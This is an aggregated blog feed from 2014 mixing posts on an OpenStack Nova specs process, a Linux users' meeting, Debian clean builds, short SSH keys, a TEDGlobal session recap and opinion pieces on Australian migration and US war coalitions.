    That was Sir Robert Menzies. Now the Federal and State Liberal Governments are unravelling it. They’re keeping the migrant worker programs- indeed they’re bigger than ever, but they’re killing off manufacturing in general and the car industry in particular. Only a couple of weeks ago the Victorian Liberal Government was boasting that Victoria’s population has continued to grow at record levels, by 1.8% outstripping the 1.7% national average, growing by 108,757 people in the year to March 31, which consisted of 38,467 natural increase and 61,923 from net overseas migration and 8,367 from net interstate migration, to a total of 5.8 million Victorian’s. Mark my words, this is not going to end well for Australia.<o:p></o:p>

    Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Beginners October Meeting: Command Line

    Oct 18 2014 12:30
    Oct 18 2014 16:30
    Oct 18 2014 12:30
    Oct 18 2014 16:30
    Location: 

    RMIT Building 91, 110 Victoria Street, Carlton South

    Wen Lin will be introducing newcomers to Linux to the use of the "command line".

    Wen Lin is the long-serving treasurer for Linux Users of Victoria and has provided several presentations in the past on Libre/OpenOffice.

    LUV would like to acknowledge Red Hat for their help in obtaining the Buzzard Lecture Theatre venue and VPAC for hosting, and BENK Open Systems for their financial support of the Beginners Workshops

    Linux Users of Victoria Inc., is an incorporated association, registration number A0040056C.

    October 18, 2014 - 12:30

    Planet Linux AustraliaMichael Still: Compute Kilo specs are open

    From my email last week on the topic:
    I am pleased to announce that the specs process for nova in kilo is
    now open. There are some tweaks to the previous process, so please
    read this entire email before uploading your spec!
    
    Blueprints approved in Juno
    ===========================
    
    For specs approved in Juno, there is a fast track approval process for
    Kilo. The steps to get your spec re-approved are:
    
     - Copy your spec from the specs/juno/approved directory to the
    specs/kilo/approved directory. Note that if we declared your spec to
    be a "partial" implementation in Juno, it might be in the implemented
    directory. This was rare however.
     - Update the spec to match the new template
     - Commit, with the "Previously-approved: juno" commit message tag
     - Upload using git review as normal
    
    Reviewers will still do a full review of the spec, we are not offering
    a rubber stamp of previously approved specs. However, we are requiring
    only one +2 to merge these previously approved specs, so the process
    should be a lot faster.
    
    A note for core reviewers here -- please include a short note on why
    you're doing a single +2 approval on the spec so future generations
    remember why.
    
    Trivial blueprints
    ==================
    
    We are not requiring specs for trivial blueprints in Kilo. Instead,
    create a blueprint in Launchpad
    at https://blueprints.launchpad.net/nova/+addspec and target the
    specification to Kilo. New, targeted, unapproved specs will be
    reviewed in weekly nova meetings. If it is agreed they are indeed
    trivial in the meeting, they will be approved.
    
    Other proposals
    ===============
    
    For other proposals, the process is the same as Juno... Propose a spec
    review against the specs/kilo/approved directory and we'll review it
    from there.
    


    After a week I'm seeing something interesting. In Juno the specs process was new, and we saw a pause in the development cycle while people actually wrote down their designs before sending the code. This time around people know what to expect, and there are left over specs from Juno lying around. We're therefore seeing specs approved much faster than in Kilo. This should reduce the effect of the "pipeline flush" that we saw in Juno.

    So far we have five approved specs after only a week.

    Tags for this post: openstack kilo blueprints spec
    Related posts: One week of Nova Kilo specifications; Blueprints to land in Nova during Juno; On layers; My candidacy for Kilo Compute PTL; Juno nova mid-cycle meetup summary: nova-network to Neutron migration; Juno Nova PTL Candidacy

    Comment

    Planet DebianDirk Eddelbuettel: Seinfeld streak at GitHub

    Early last year, I referred to a Seinfeld Streak in a blog post referring to almost two months of updates to the Rcpp Gallery. This is sometimes called Jerry Seinfeld's secret to productivity: Just keep at it. Don't break the streak.

    I now have different streak:

    github activity october 2013 to october 2014

    Now we'll see how far this one will go.

    This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

    ,

    Sam VargheseAmerica forms coalitions to make money

    WHEN the United States talks about coalitions, one should realise that it is all about finance. Not about bringing together countries to fight a war together.

    Back in 1990, when Iraq invaded Kuwait, George Bush Senior put his foot in it by threatening never to take it lying down. He was forced to go to war, reluctantly. But his secretary of state James Baker made things worthwhile by bringing together a bunch of nations who were prepared to pick up the bills.

    The Americans did the lion’s share of the fighting. And the others in the “coalition” paid the bills.

    For example, Japan and Germany could definitely not take part in any fighting, given that the constitutions of both countries at the time did not allow them to participate in conflicts. But each gave $US9 billion to the effort. The US ended up with a profit of $US6 billion after collecting $US60 billion and spending $US54 billion.

    That alone made the effort to bring the “coalition” together worthwhile.

    The US also benefits through the sale of weapons. Practically all the countries which are part of the current “coalition” which has banded together to fight the Islamic State extremists use American weapons.

    Presto, all the missiles which get used will have to be replaced. Factor in anything from $US50 million to $US650 million, depending on how sophisticated the missile is. The stocks of companies that are part of the US military industrial complex have soared ever since the conflict erupted and American patriots like Dick Cheney have been watching their bank accounts swell.

    TEDSideways solutions and inverted explanations: A recap of session 10 of TEDGlobal 2014

    Juana Molina performs at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    Juana Molina performs at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    The thinkers in this session, “Lateral Action,” don’t go about creating change in the usual ways. Here, their unexpected approaches:

    Argentinian singer-songwriter Juana Molina opens the session with a hypnotizing performance on the electric guitar and a rack of pedals that layer sounds into gorgeously complex song structures. Singing calmly behind layers of chords, she mixes Spanish lyrics with simple tones that loop in on one another and build and build. At the back of the auditorium stand a few rock-concert-style head-nodding fans, some wearing event staff T-shirts, drinking in the glorious noise as she plays “Ferocisimo” and “Bicho Auto” from her latest record, Wed 21. Watch a full performance from this May.

    When she was 16, Khalida Brohi found out that a close friend was a victim of an “honor killing.” Growing up between a big city and a small village in Pakistan, she honored the family traditions from her village, and she’d seen friends enter arranged marriages — but the “honor killing” shook her to her core. “A custom that kills just didn’t make any sense to me,” she said. And so she launched a campaign to stop it — one that quickly gained momentum online. But at home, her family’s car was stoned; her life was threatened. She had to let the campaign end. “As an 18-year-old, I thought this was the biggest faiilure of my life,” says Brohi. But it taught her two important lessons: (1) That she had to align calls for change with the core values of the community and (2) that she needed to include the women themselves in her campaign. So Brohi did something bold: she apologized to the community, and set about promoting tribal traditions like music and storytelling. She also asked her tribal leaders for support in building a center where women could do traditional embroidery. With this, the Sughar Empowerment Society was born. Women do embroidery here, yes, but they also get a six-month education about their rights and about the art of entrepreneurship. So far, Sughar has reached 900 women and 24 villages. But Brohi hopes to build this movement to the point where, in the next 10 years, she reaches more like a million. [Read a Q&A with Khalida that tells much more of her story.]

    To write a book on Rio’s underground drug trade, journalist Misha Glenny is learning to speak Brazilian Portuguese, or Carioca. His biggest takeaway: His mind is just not what it used to be. Glenny, now in his mid-50s, finds that his short-term memory is wearing down and his ability to imitate new sounds is also shot. Of his initial attempts to produce a nasal affect, Glenny jokes: “My teachers said I sounded like a cat being tortured … in Polish.” And as a 50-something he doesn’t quite have the opportunities he used to have when practicing a new language: getting drunk and chatting up girls at parties. Nonetheless Glenny is devoted to his education, hoping that his linguistic journey will help him better understand the Brazilian culture he’s come to adore.

    What makes you go to a museum to see a picture hanging on a wall, instead of just downloading that picture on your mobile phone? Vik Muniz believes it’s for the quiet, magical moment that hovers between what we can know and what we can only assume about the art. His art captures this moment beautifully through a variety of media, including sugar, chocolate and living cells. All of his art asks people to question their assumptions about what they think they know about the world.

    Urban architect Alejandro Aravena has taken on difficult design challenges in Chile, but he believes that the more complex the problem, the greater the need for simplicity. He shares three success stories: First, when asked to create low-income housing with a budget for only half the size of comfortable middle-class homes, his team invented half-houses with the framework to build further later, inspired by the owner-built energy of favelas. Next, when challenged to use less energy in a traditional office building, he devised an inside-out structure, with an opaque cooling exterior and a light-giving atrium center that reduced energy costs by two-thirds. Last, when asked to rebuild after the 2010 Chile earthquake, he created a barrier to keep out future tsunami waves that also solved the concurrent problem of poor public space: a small forest. In all three projects, he solved his problems through community participation, and a little common sense. He says, “We won’t ever solve the problem unless we use people’s own capacity to build.”

    “If you’re giving back, you took too much,” says organizational changemaker Ricardo Semler, 20 years after transforming a struggling Brazilian equipment supplier into a radically democratic, resilient and successful company. He prefers to give as he goes, so he continues to create new companies, books and education options like the Lumiar School as he grows older. It sounds crazy, and deeply wise, but it works. One tool he recommends: Ask yourself “3 whys” in a row: By the third why, you will come to new answers.

    Ricardo Semler speaks at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    Ricardo Semler speaks at TEDGlobal 2014. Photo: James Duncan Davidson/TED


    Planet DebianJonathan Wiltshire: Clean builds for the win

    I’ve just spent a little time squashing several bugs on the trot, all the same: insufficient build-dependencies when built in a clean environment. Typically this means that the package was uploaded after being built on a developer’s normal machine, which already has everything required installed.

    It’s long been the case that we have several ways to build packages in a clean chroot before upload, which reveals these sorts of errors and more. There’s not really any excuse for uploading packages that fail to build in this way.

    Please, for the sanity of everyone working with the archive, don’t upload packages that haven’t been built in a clean environment. It’s such a waste of everybody’s time if you don’t do this most basic of checks.


    Clean builds for the win is a post from: jwiltshire.org.uk | Flattr

    Planet DebianSteinar H. Gunderson: Short SSH keys

    I'm sure this is useful for something beyond being neat:

    klump:~> cat .ssh/id_ed25519.pub
    ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFePWUlZmVbCZ9KHa4pOOMBXHaMFeuuIZDw0uHHEY2/m sesse@klump
    

    I hope OpenSSH doesn't eventually grow a sort-of single point of failure in “djb ALL the algorithms!” by default, though.